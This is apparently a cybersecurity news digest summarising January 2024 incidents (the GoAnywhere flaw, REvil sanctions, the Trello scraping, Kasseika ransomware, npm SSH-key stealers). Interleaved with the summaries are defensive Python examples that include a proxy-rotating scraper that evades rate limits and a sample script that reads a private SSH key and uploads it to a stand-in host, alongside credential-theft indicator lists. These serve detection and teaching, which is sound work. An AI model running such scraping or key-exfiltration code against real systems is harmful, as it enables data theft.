Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 12655
Checks for new stories every ~15 minutes
| Timestamp | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2024-01-24 06:32:07 | theregister | NATION STATE ACTIVITY | Warning of AI-Enhanced State-Sponsored Cyber Threats by 2025 | The UK National Cyber Security Centre (NCSC) warns that by 2025 AI could significantly enhance the capabilities of state-backed attackers, including their ability to evade current detection systems.
Highly capable states are likely to already hold the data needed to train AI models for malware development, namely large repositories of existing malware, raising the prospect of new, sophisticated threats.
The NCSC forecasts that AI will enhance attackers' abilities to discover vulnerabilities, analyze data in real-time, and identify valuable files for effective data theft or extortion.
Predictions suggest that both highly skilled actors and lower-skilled cybercriminals will benefit from AI advancements, with the latter improving their social engineering and ransomware tactics.
The report emphasizes the need for continued investment and expertise in AI to keep up with the evolving threat landscape and advises organizations to follow recommended cyber security practices.
The upcoming CYBERUK conference will focus on the challenges of emerging technologies like AI and their national security implications, with a call to manage AI’s cyber threat risks responsibly.
The NCSC's report follows initiatives such as The Bletchley Declaration from the AI Safety Summit, aimed at managing AI risks, although such agreements lack enforcement mechanisms. | Details |
| 2024-01-24 05:41:05 | thehackernews | CYBERCRIME | High-Risk Admin Creation Flaw in GoAnywhere MFT Software | A critical security flaw (CVE-2024-0204) with a 9.8 CVSS score was found in Fortra's GoAnywhere MFT software, allowing unauthorized creation of admin users.
Fortra issued an advisory on January 22, 2024, providing guidance for users who cannot immediately upgrade to the patched version 7.4.1.
For users who cannot upgrade, the workaround depends on the deployment type: in non-container installs, delete the InitialAccountSetup.xhtml file from the install directory and restart the services; in container deployments, replace the file with an empty file and restart.
The vulnerability was identified by researchers Mohammed Eldeeb and Islam Elrfai and was caused by a path traversal weakness.
Cybersecurity firm Horizon3.ai released a proof-of-concept (PoC) exploit and explained how to detect compromises by checking for new admin users in the GoAnywhere administrator portal.
So far, there is no evidence of active exploitation of this particular vulnerability; however, another flaw (CVE-2023-0669) in GoAnywhere MFT was previously leveraged by the Cl0p ransomware group. | Details |
| 2024-01-23 23:19:58 | bleepingcomputer | CYBERCRIME | Fortra GoAnywhere MFT Exploit Revealed: Critical Auth Bypass Vulnerability | Fortra's GoAnywhere Managed File Transfer (MFT) software faced a critical authentication bypass vulnerability allowing creation of new admin users on unpatched systems.
Exploit code for the vulnerability (CVE-2024-0204) is now public, allowing attackers to create new administrator accounts on unpatched instances and then log into the admin portal with full control.
Fortra fixed the bug silently in GoAnywhere MFT 7.4.1 on December 7, 2023, and initially described it only in a private customer advisory; public disclosure followed later.
Security researchers from Horizon3's Attack Team published technical details and a proof-of-concept (PoC) exploit nearly seven weeks after the patch.
Clop ransomware gang exploited a different vulnerability in GoAnywhere MFT to breach over 100 organizations, with high-profile victims including Community Health Systems and Procter & Gamble.
The current recommendation for admins unable to immediately update is to remove the attack vector as specified by Fortra, while monitoring for any unexpected additions to admin user groups.
This incident is part of a broader pattern of cybercriminals targeting MFT platforms over the years. | Details |
| 2024-01-23 22:18:36 | bleepingcomputer | CYBERCRIME | Coordinated International Sanctions Target REvil Hacker Over Medibank Breach | Australia, the US, and the UK have sanctioned Aleksandr Gennadievich Ermakov for the Medibank ransomware attack.
The Medibank breach in October 2022 led to the leak of data for about 10 million individuals, including sensitive health information.
Ermakov, associated with multiple online aliases, was identified as a key member of the REvil ransomware group.
This trilateral sanction represents the first coordinated action against cybercriminals by the partnering countries.
The sanctions aim to disrupt Ermakov's operations by stripping away his financial resources and anonymity, key elements for cybercriminals.
Although Ermakov may attempt to evade these sanctions, international authorities hope to deter others from facilitating his illegal activities, including providing ransom payments.
Naming and sanctioning Ermakov marks a significant step in the global fight against ransomware and cybercrime, emphasizing the commitment to accountability. | Details |
| 2024-01-23 22:13:18 | bleepingcomputer | CYBERCRIME | International Sanctions Target REvil Hacker for Medibank Breach | Sanctions have been announced by Australia, USA, and UK against Russian national Aleksandr Gennadievich Ermakov for his involvement in the Medibank ransomware attack.
Ermakov, a member of the notorious REvil ransomware group, is believed to be responsible for the 2022 cyberattack on Medibank, a major Australian health insurer.
The Medibank breach resulted in the theft and subsequent leakage of sensitive data pertaining to approximately 10 million individuals, including personal and health information.
Investigations led to the identification of Ermakov and his online aliases, presenting evidence of his role in the cyber crime.
The coordinated sanctions signify a joint effort by the involved nations to deter cybercriminal activities and hold perpetrators accountable.
The public exposure of Ermakov's identity aims to disrupt his operations by removing the protective veil of anonymity critical to cybercriminals.
Financial sanctions could impede further illicit transactions, including ransomware payments, by criminalizing any transfer of assets to Ermakov.
The collaborative international response reflects growing global intolerance toward cybercriminals targeting critical infrastructure and personal data. | Details |
| 2024-01-23 21:57:40 | bleepingcomputer | CYBERCRIME | Veolia North America's Water Services Disrupted by Ransomware Attack | Veolia North America, part of the global conglomerate Veolia, has experienced a ransomware attack affecting its Municipal Water division's systems and online bill payment services.
The company took immediate defensive actions, temporarily disabling certain systems to prevent further impact and has since restored affected systems and servers.
Veolia said customers would not be penalized by the outage: no late fees or interest will apply to payments delayed during the disruption, and water treatment and wastewater services continued without interruption.
A limited number of individuals potentially had their personal information compromised; Veolia is collaborating with law enforcement and cybersecurity experts to evaluate the incident's ramifications.
Veolia provides essential services across the U.S. and Canada, treating billions of gallons of water daily; the broader Veolia group serves millions worldwide with water and waste treatment.
Similar ransomware attacks have targeted other water service providers, including Southern Water in the UK, prompting cybersecurity agencies to push for enhanced security measures in the water sector.
Increasing cyber threats to water infrastructure have led to advisories by CISA and partner agencies, emphasizing the need for robust incident response plans to protect critical utilities. | Details |
| 2024-01-23 21:36:54 | bleepingcomputer | DATA BREACH | Trello API Exploit Links Millions of Email Addresses to User Accounts | An exposed API on the project management tool Trello allowed a threat actor to link private email addresses to public Trello profiles.
Approximately 15 million Trello users' data has been compromised, with the actor attempting to sell the information online.
Trello, owned by Atlassian, claims the data was scraped rather than stolen by unauthorized access to their systems.
The threat actor reportedly fed a list of 500 million email addresses to a Trello API endpoint that, at the time, returned the public profile associated with an email address without requiring authentication.
Rotating proxy servers let the actor sidestep Trello's per-IP API rate limits and keep querying continuously.
Trello has updated the API to prevent unauthenticated requests but maintains functionality for authenticated users.
The incident highlights potential risks for targeted phishing attacks and has been added to the Have I Been Pwned breach notification service.
It mirrors a similar leak involving a Twitter API bug that linked private contact details to public Twitter profiles. | Details |
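The Trello incident above is a textbook case of an unauthenticated lookup endpoint whose only abuse control is a per-IP rate limit, which a proxy pool defeats. The model below is an added example written for this brief, not Trello's code: the service, its API shape, the limits and the proxy pool are all constructed. It contrasts an anonymous endpoint keyed on client IP with an authenticated one keyed on the caller's token, and runs the same scraping loop against both.

```python
"""Model of an email-to-profile lookup endpoint and a scraping loop run against it.
Added example, not Trello's code; the API shape, limits and data are constructed."""
from collections import defaultdict
from typing import Dict, List, Optional, Tuple


class LookupService:
    """Resolves an email address to a public profile handle, with a per-principal rate limit."""

    def __init__(self, directory: Dict[str, str], require_auth: bool, limit: int, valid_tokens=()):
        self.directory = directory          # email -> public handle (constructed data)
        self.require_auth = require_auth
        self.limit = limit                  # requests allowed per principal per window
        self.valid_tokens = set(valid_tokens)
        self.counts = defaultdict(int)      # principal -> requests seen this window

    def lookup(self, email: str, client_ip: str, token: Optional[str] = None) -> Dict[str, Optional[str]]:
        if self.require_auth:
            if token not in self.valid_tokens:
                return {"error": "unauthorized"}
            principal = ("token", token)    # keyed on the account, which cannot be rotated like an IP
        else:
            principal = ("ip", client_ip)   # an anonymous caller can only be keyed on its source IP
        if self.counts[principal] >= self.limit:
            return {"error": "rate_limited"}
        self.counts[principal] += 1
        return {"email": email, "profile": self.directory.get(email)}


def scrape(service: LookupService, emails: List[str], proxy_ips: List[str],
           token: Optional[str] = None) -> Dict[str, str]:
    """Attacker loop: query each email, moving to the next proxy whenever the current one is rate limited."""
    matched: Dict[str, str] = {}
    ip_index = 0
    for email in emails:
        for _attempt in range(len(proxy_ips)):
            resp = service.lookup(email, proxy_ips[ip_index % len(proxy_ips)], token)
            if resp.get("error") == "rate_limited":
                ip_index += 1               # rotate proxy and retry this email
                continue
            if resp.get("error") == "unauthorized":
                return matched              # no valid token: nothing more to do
            if resp["profile"]:
                matched[email] = resp["profile"]
            break
        else:
            break                           # every proxy is exhausted for this window
    return matched


def demo() -> Tuple[int, int, int]:
    """How many of 100 emails resolve under each policy with 5 proxies and a limit of 10 per principal."""
    directory = {f"user{i}@example.com": f"@user{i}" for i in range(100)}
    emails = list(directory)
    proxies = [f"198.51.100.{i}" for i in range(5)]     # constructed proxy pool

    anonymous = LookupService(directory, require_auth=False, limit=10)
    authed = LookupService(directory, require_auth=True, limit=10, valid_tokens={"tok-1"})
    return (
        len(scrape(anonymous, emails, proxies)),               # per-IP limit: each proxy adds 10 lookups
        len(scrape(authed, emails, proxies, token="tok-1")),   # per-account limit: proxies do not help
        len(scrape(authed, emails, proxies)),                  # no token at all: nothing resolves
    )


if __name__ == "__main__":
    print("resolved (anonymous, authenticated, no token):", demo())
```

Requiring authentication only changes the unit of abuse from IPs to accounts: an attacker with N throwaway accounts still gets N times the limit, so account creation needs its own throttling, and the stronger fix is to not expose an email-to-profile lookup to arbitrary callers at all.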
| 2024-01-23 20:20:25 | bleepingcomputer | MISCELLANEOUS | Major Platform Introduces Passkeys for Enhanced iOS User Security | X, formerly known as Twitter, has rolled out the use of passkeys for iOS user logins in the United States.
Passkeys replace passwords with public key cryptography: the private key never leaves the user's device and the credential is bound to the site it was registered for, so it cannot be phished, replayed on a lookalike site, or leaked from a server-side password database.
The new system does away with the need for passwords, reducing user burden and increasing security.
Passkeys will synchronize across iOS devices via iCloud Keychain, ensuring backup in case of a device loss and enabling recovery through iCloud Keychain escrow if all devices are lost.
Users can set up a passkey by accessing the security settings on their X account and following a guided process.
The move to implement passkeys comes in the wake of several high-profile account hijacks on X, aiming to enhance security and prevent similar incidents.
Although highly recommended, the use of passkeys by iOS users in the U.S. is optional and not mandatory at present. | Details |
| 2024-01-23 19:59:32 | bleepingcomputer | MALWARE | Kasseika Ransomware Disables Antivirus Software Before Encrypting Files | Kasseika ransomware uses a Bring Your Own Vulnerable Driver (BYOVD) technique to disable antivirus software before encrypting files.
It loads a legitimate signed driver from TG Soft's VirIT Agent System and abuses it to terminate security processes.
Trend Micro analysts noted similarities between Kasseika and the defunct BlackMatter ransomware, suggesting a connection.
The attack starts with a phishing email and progresses through credential theft, PsExec tool abuse, and lateral movement within the targeted network.
Kasseika terminates a list of processes, including those belonging to security tools, before running its encryption routine, which uses the ChaCha20 and RSA algorithms.
Once files are encrypted, Kasseika issues a ransom note, changes the desktop wallpaper, and demands payment within 72 hours to prevent an increase in ransom amount.
After the encryption process, Kasseika attempts to erase its tracks by clearing system event logs.
Trend Micro has released indicators of compromise for organizations to detect Kasseika-related activities. | Details |
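The Kasseika chain summarized above (vulnerable driver loaded, security processes terminated, event logs cleared) is a sequence that a host-level correlation rule can catch even without a signature for the specific driver. The detector below is an added example written for this brief, not Trend Micro's indicators or detection content. The events are constructed, loosely modelled on Sysmon (ID 6 driver loaded, ID 5 process terminated) and the Windows Security (ID 1102) and System (ID 104) log-cleared records; the security process names other than MsMpEng.exe are placeholders.

```python
"""Correlate driver loads, security-tool terminations and log clearing per host.
Added example for this brief, not Trend Micro's detection content; events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

WINDOW = timedelta(minutes=10)
# Endpoint security process names. MsMpEng.exe is Defender; the others are constructed
# placeholders. Replace with the agents actually deployed in your estate.
SECURITY_PROCESSES = {"msmpeng.exe", "avservice.exe", "edragent.exe"}
TRUSTED_DRIVER_DIR = "c:\\windows\\system32\\drivers\\"

# Constructed sample events (not from any real host).
SAMPLE_EVENTS = [
    {"ts": "2024-01-20T10:00:05", "host": "WS01", "channel": "Sysmon", "id": 6, "image": "C:\\Users\\Public\\drv.sys"},
    {"ts": "2024-01-20T10:00:20", "host": "WS01", "channel": "Sysmon", "id": 5, "image": "C:\\Program Files\\Windows Defender\\MsMpEng.exe"},
    {"ts": "2024-01-20T10:00:22", "host": "WS01", "channel": "Sysmon", "id": 5, "image": "C:\\Program Files\\EDR\\edragent.exe"},
    {"ts": "2024-01-20T10:03:40", "host": "WS01", "channel": "Security", "id": 1102, "image": ""},
    {"ts": "2024-01-20T10:03:41", "host": "WS01", "channel": "System", "id": 104, "image": ""},
    # WS02: routine driver load from the system driver directory, nothing else
    {"ts": "2024-01-20T11:15:00", "host": "WS02", "channel": "Sysmon", "id": 6, "image": "C:\\Windows\\System32\\drivers\\ndis.sys"},
    # WS03: odd driver load and one AV process exit, but no log clearing
    {"ts": "2024-01-20T12:00:00", "host": "WS03", "channel": "Sysmon", "id": 6, "image": "C:\\Temp\\drv.sys"},
    {"ts": "2024-01-20T12:00:30", "host": "WS03", "channel": "Sysmon", "id": 5, "image": "C:\\Program Files\\Windows Defender\\MsMpEng.exe"},
]


def parse_ts(text: str) -> datetime:
    return datetime.fromisoformat(text)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_unusual_driver_load(ev: Dict) -> bool:
    """Sysmon 6 for a driver loaded from outside the system driver directory."""
    return ev["channel"] == "Sysmon" and ev["id"] == 6 \
        and not ev["image"].lower().startswith(TRUSTED_DRIVER_DIR)


def is_security_process_kill(ev: Dict) -> bool:
    return ev["channel"] == "Sysmon" and ev["id"] == 5 and basename(ev["image"]) in SECURITY_PROCESSES


def is_log_clear(ev: Dict) -> bool:
    return (ev["channel"], ev["id"]) in {("Security", 1102), ("System", 104)}


def find_byovd_chains(events: List[Dict], window: timedelta = WINDOW, min_kills: int = 2) -> List[Dict]:
    """Alert when an unusual driver load is followed, within the window on the same host,
    by at least min_kills security-tool terminations and a log-cleared record."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):   # ISO timestamps sort lexically
        by_host[ev["host"]].append(ev)

    alerts = []
    for host, evs in by_host.items():
        for i, anchor in enumerate(evs):
            if not is_unusual_driver_load(anchor):
                continue
            t0 = parse_ts(anchor["ts"])
            later = [e for e in evs[i + 1:] if parse_ts(e["ts"]) - t0 <= window]
            kills = [e for e in later if is_security_process_kill(e)]
            clears = [e for e in later if is_log_clear(e)]
            if len(kills) >= min_kills and clears:
                alerts.append({
                    "host": host,
                    "driver": anchor["image"],
                    "killed": sorted({basename(k["image"]) for k in kills}),
                    "log_cleared_at": clears[0]["ts"],
                })
    return alerts


if __name__ == "__main__":
    for alert in find_byovd_chains(SAMPLE_EVENTS):
        print(alert)
```

Two practical caveats: clearing the logs itself writes a 1102/104 record, but that record only survives if events are forwarded off the host in near real time, so this rule is only as good as your log shipping; and the "unusual path" heuristic will fire on legitimate third-party drivers under Program Files, so in production pair it with a vulnerable-driver blocklist such as Microsoft's recommended driver block rules.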
| 2024-01-23 18:33:01 | theregister | MISCELLANEOUS | CISA Director Jen Easterly Targeted in Swatting Incident | CISA Director Jen Easterly was the victim of a swatting attempt at her home on December 30, following a hoax report of a shooting.
The dangerous trend of swatting has been targeting politicians, election officials, judges, and even gamers, posing severe risks to the individuals and responding law enforcement officers.
In her statement, Easterly emphasized the harassment threat to public officials and pledged CISA’s support to safeguard election officials and the democratic process.
Swatting incidents have escalated and been leveraged in extortion attempts, with criminals targeting hospitals and medical clinics, demanding ransoms.
The incident was initially reported by local news, with the Arlington County police investigating the hoax 911 call. However, the identity of the perpetrator or motives behind the targeting remains undisclosed.
Recent swatting incidents in the US have affected various public figures, including Maine's Secretary of State and individuals related to cases against Donald Trump, highlighting the practice’s increase as the 2024 presidential election approaches. | Details |
| 2024-01-23 16:45:46 | bleepingcomputer | DATA BREACH | Jason's Deli Customer Accounts Compromised in Credential Stuffing | Jason's Deli has issued a data breach notification alerting customers to a credential stuffing attack.
Unauthorized parties logged into customers' reward and online ordering accounts using credentials stolen elsewhere, potentially affecting 344,034 individuals.
Attacks on December 21, 2023, utilized login information likely garnered from unrelated previous data breaches.
The breach's impact varies based on the personal information customers added to their profiles.
Jason's Deli admitted it's unable to assess the full scope of the breach but is informing all potentially affected users.
Customers are advised to reset their passwords and to use unique credentials and two-factor authentication (2FA) on every platform.
The company has committed to restoring any unauthorized usage of Deli Dollars reward points to ensure customers do not incur losses. | Details |
| 2024-01-23 16:04:07 | theregister | DATA BREACH | Baltimore Man Charged for Selling Personal Data in Fraud Operation | A Baltimore resident, Chouby Charleron, allegedly sold personal data used for financial fraud, potentially facing a 20-year prison sentence.
Operating under the alias "The Real Jwet King," Charleron reportedly ran a "TLO" lookup service in an online chat group, trafficking in victims' personally identifiable information (PII).
The service imitated TLOxp, a legitimate investigative tool that returns detailed personal records, and was used by criminals to commit identity theft and obtain credit cards fraudulently.
He operated without a VPN, which let U.S. Postal Inspection Service investigators trace the activity directly to his home IP address.
Over 5,000 individuals' PII was sold, enabling fraudulent credit card activations and purchases totaling tens of thousands of dollars.
Court documents describe cases where Charleron responded rapidly to criminal requests, providing PII within minutes for fraudulent financial activities.
Despite an active arrest warrant, Charleron's current custody status is unclear, and he is charged with conspiracy to commit wire fraud, which includes hefty fines and lengthy prison time. | Details |
| 2024-01-23 15:43:10 | bleepingcomputer | CYBERCRIME | Critical Vulnerability in GoAnywhere MFT Urges Immediate Patching | Fortra has issued a warning about a critical authentication bypass vulnerability in GoAnywhere MFT versions prior to 7.4.1.
The flaw, tracked as CVE-2024-0204, allows attackers to remotely create new administrative users, gaining full system control.
With a CVSS score of 9.8, the vulnerability poses serious risks, including data access, malware introduction, and enabling further network attacks.
The issue affects GoAnywhere MFT versions 6.0.1 to 7.4.0, and a fix is available in version 7.4.1, released on December 7, 2023.
Fortra has released both patches and manual mitigation recommendations for users to protect against the vulnerability.
Previously, the Clop ransomware gang exploited a different flaw in GoAnywhere MFT, resulting in breaches at over 130 organizations.
Organizations using GoAnywhere MFT are advised to promptly apply security updates and monitor logs for any signs of compromise. | Details |
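The three GoAnywhere items above give everything needed for a quick triage: the affected range (6.0.1 through 7.4.0, fixed in 7.4.1) and the interim workaround (delete InitialAccountSetup.xhtml, or replace it with an empty file in container deployments). The helper below is an added example written for this brief, not Fortra's or Horizon3's tooling. It walks the install directory for the file rather than assuming a fixed subpath, since that varies by build; the install tree it builds for its own demo is constructed.

```python
"""Triage helper for CVE-2024-0204 in Fortra GoAnywhere MFT.
Added example for this brief, not Fortra's or Horizon3's tooling."""
import os
import tempfile
from typing import Dict, Tuple

# Affected range as stated in Fortra's advisory: 6.0.1 through 7.4.0, fixed in 7.4.1.
FIRST_AFFECTED = (6, 0, 1)
FIXED_IN = (7, 4, 1)
SETUP_PAGE = "InitialAccountSetup.xhtml"  # the page Fortra's interim workaround removes


def parse_version(text: str) -> Tuple[int, ...]:
    """'7.4.0' or '7.4.0-build12' -> (7, 4, 0); short forms like '7.4' pad to three parts."""
    core = text.strip().split("-")[0]
    parts = tuple(int(p) for p in core.split("."))
    return parts + (0,) * max(0, 3 - len(parts))


def is_affected(version: str) -> bool:
    """True when the installed version falls inside the vulnerable range."""
    return FIRST_AFFECTED <= parse_version(version) < FIXED_IN


def workaround_state(install_dir: str) -> str:
    """Locate InitialAccountSetup.xhtml anywhere under the install directory.

    'absent'  -> deleted (Fortra's non-container workaround)
    'empty'   -> replaced with an empty file (Fortra's container workaround)
    'present' -> still in place, so the endpoint is reachable
    """
    for root, _dirs, files in os.walk(install_dir):
        if SETUP_PAGE in files:
            path = os.path.join(root, SETUP_PAGE)
            return "empty" if os.path.getsize(path) == 0 else "present"
    return "absent"


def assess(version: str, install_dir: str) -> str:
    """Combine the version check and the workaround check into one verdict."""
    if not is_affected(version):
        return "not_affected"
    state = workaround_state(install_dir)
    if state == "present":
        return "vulnerable"          # upgrade to 7.4.1 or apply the workaround now
    return f"workaround:{state}"     # interim only; still upgrade to 7.4.1


def demo() -> Dict[str, str]:
    """Exercise assess() against a constructed install tree in a temp dir (layout is made up)."""
    with tempfile.TemporaryDirectory() as install_dir:
        page_dir = os.path.join(install_dir, "pages")
        os.makedirs(page_dir)
        page = os.path.join(page_dir, SETUP_PAGE)
        results = {}
        with open(page, "w", encoding="utf-8") as fh:
            fh.write("<html/>")                          # stand-in for the real page
        results["unpatched"] = assess("7.4.0", install_dir)
        open(page, "w").close()                          # container workaround: empty file
        results["emptied"] = assess("7.4.0", install_dir)
        os.remove(page)                                  # non-container workaround: delete
        results["deleted"] = assess("7.4.0", install_dir)
        results["upgraded"] = assess("7.4.1", install_dir)
        return results


if __name__ == "__main__":
    for label, verdict in demo().items():
        print(f"{label}: {verdict}")
```

A "workaround" verdict is not the end of the job: the file removal only blocks the setup page, so still upgrade, and, as Horizon3 advised, review the Admin Users list and the audit logs for accounts you did not create.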
| 2024-01-23 14:36:33 | thehackernews | CYBERCRIME | VexTrio: Mastermind Traffic Broker in Global Cybercrime Syndicate | VexTrio is a large cybercrime affiliate program identified by Infoblox that brokers web traffic for more than 60 affiliates, including the operators of ClearFake and SocGholish.
Active since at least 2017, VexTrio has distributed malware such as Glupteba through algorithmically generated domains and compromised websites.
In August 2023, VexTrio employed compromised WordPress sites to redirect users to malicious content using a sophisticated DNS-based traffic distribution system (TDS).
VexTrio boasts a network of over 70,000 domains managing web traffic for its criminal efforts, using a dual system of HTTP and DNS-based TDS servers.
The TDS servers profile site visitors based on attributes like geolocation and browser settings to reroute them to fraudulent sites, filtering non-profitable traffic.
Infoblox highlights the operation's complexity and resilience, citing the intertwined affiliate network that has evaded definitive classification for over six years.
The affiliate network leverages security vulnerabilities in CMS software, particularly WordPress, to inject malicious JavaScript and propagate nefarious activities. | Details |
| 2024-01-23 14:25:55 | thehackernews | MALWARE | Malicious npm Packages Compromise SSH Keys Via GitHub | Two npm packages, warbeast2000 and kodiak2k, were found stealing developers' SSH keys and uploading them to an attacker-controlled GitHub repository.
The packages were downloaded over 1,600 times before npm maintainers removed them.
The security firm ReversingLabs identified multiple versions of the malicious packages, indicating an ongoing threat.
The packages' postinstall scripts executed additional malicious JavaScript that read the private SSH key from the user's .ssh directory and exfiltrated it.
The kodiak2k package was also seen executing a script capable of launching Mimikatz to extract credentials from memory.
This incident highlights the continued risk of malicious software within open source package repositories and the impact on software supply chain security. | Details |
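Both packages above did their damage from an install hook, which npm runs automatically. The audit below is an added example written for this brief, not ReversingLabs' tooling: it walks an installed node_modules tree, lists every package that declares an install-time script, and scans both the hook command and any local script it launches via `node <file>` for crude credential-theft and download indicators. The node_modules tree it builds for its demo is constructed, and the package names and file contents in it are made up.

```python
"""Audit an installed node_modules tree for packages that run lifecycle scripts on install.
Added example for this brief, not ReversingLabs' tooling; the sample tree is constructed."""
import json
import os
import tempfile
from typing import Dict, List

# Hooks npm runs automatically during `npm install` (prepare also runs for git and local deps).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Crude content indicators for credential theft or download-and-run behaviour; tune to taste.
INDICATORS = (".ssh", "id_rsa", "id_ed25519", "http://", "https://", "curl ", "wget ", "base64", "child_process")


def _scan_text(text: str) -> List[str]:
    return sorted(i for i in INDICATORS if i in text)


def _hook_targets(command: str, pkg_dir: str) -> List[str]:
    """Files a hook command executes via `node <file>`, resolved inside the package."""
    tokens = command.split()
    targets = []
    for i, tok in enumerate(tokens[:-1]):
        if tok == "node" and tokens[i + 1].endswith((".js", ".mjs", ".cjs")):
            path = os.path.join(pkg_dir, tokens[i + 1])
            if os.path.isfile(path):
                targets.append(path)
    return targets


def audit_node_modules(root: str) -> List[Dict]:
    """Return one finding per package that declares an install-time hook, sorted by name."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):   # also descends into @scope/ and nested node_modules
        if "package.json" not in files:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                pkg = json.load(fh)
            except ValueError:
                continue
        hooks = {k: v for k, v in (pkg.get("scripts") or {}).items() if k in LIFECYCLE_HOOKS}
        if not hooks:
            continue
        indicators = set()
        for command in hooks.values():
            indicators.update(_scan_text(command))            # indicators in the command itself
            for target in _hook_targets(command, dirpath):     # and in the script it launches
                with open(target, encoding="utf-8", errors="replace") as fh:
                    indicators.update(_scan_text(fh.read()))
        findings.append({
            "name": pkg.get("name", os.path.relpath(dirpath, root)),
            "hooks": hooks,
            "indicators": sorted(indicators),
        })
    return sorted(findings, key=lambda f: f["name"])


def _write_pkg(nm: str, name: str, manifest: Dict, extra: Dict[str, str] = None) -> None:
    """Write a constructed package directory with its package.json and any extra files."""
    pkg_dir = os.path.join(nm, name)
    os.makedirs(pkg_dir, exist_ok=True)
    with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
        json.dump(manifest, fh)
    for rel, content in (extra or {}).items():
        path = os.path.join(pkg_dir, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo() -> List[Dict]:
    """Build a constructed node_modules tree and audit it. Names and contents are made up."""
    with tempfile.TemporaryDirectory() as tmp:
        nm = os.path.join(tmp, "node_modules")
        _write_pkg(nm, "plain-lib", {"name": "plain-lib", "version": "1.0.0"})
        _write_pkg(nm, "native-addon", {"name": "native-addon", "scripts": {"install": "node-gyp rebuild"}})
        _write_pkg(nm, "example-stealer",
                   {"name": "example-stealer", "scripts": {"postinstall": "node lib/setup.js"}},
                   extra={"lib/setup.js":
                          "// constructed stand-in for the behaviour described above\n"
                          "const fs = require('fs');\n"
                          "const key = fs.readFileSync(process.env.HOME + '/.ssh/id_rsa');\n"
                          "fetch('https://example.invalid/upload', {method: 'POST', body: key});\n"})
        return audit_node_modules(nm)


if __name__ == "__main__":
    for finding in demo():
        print(finding["name"], finding["hooks"], finding["indicators"])
```

Run it after an `npm install --ignore-scripts` (or with `ignore-scripts=true` set in npm config) so the hooks never execute before you have looked at them; native addons with an `install` hook and no indicators are the normal case, and anything that reads from `.ssh` or phones home deserves a manual read of the script before you let it run.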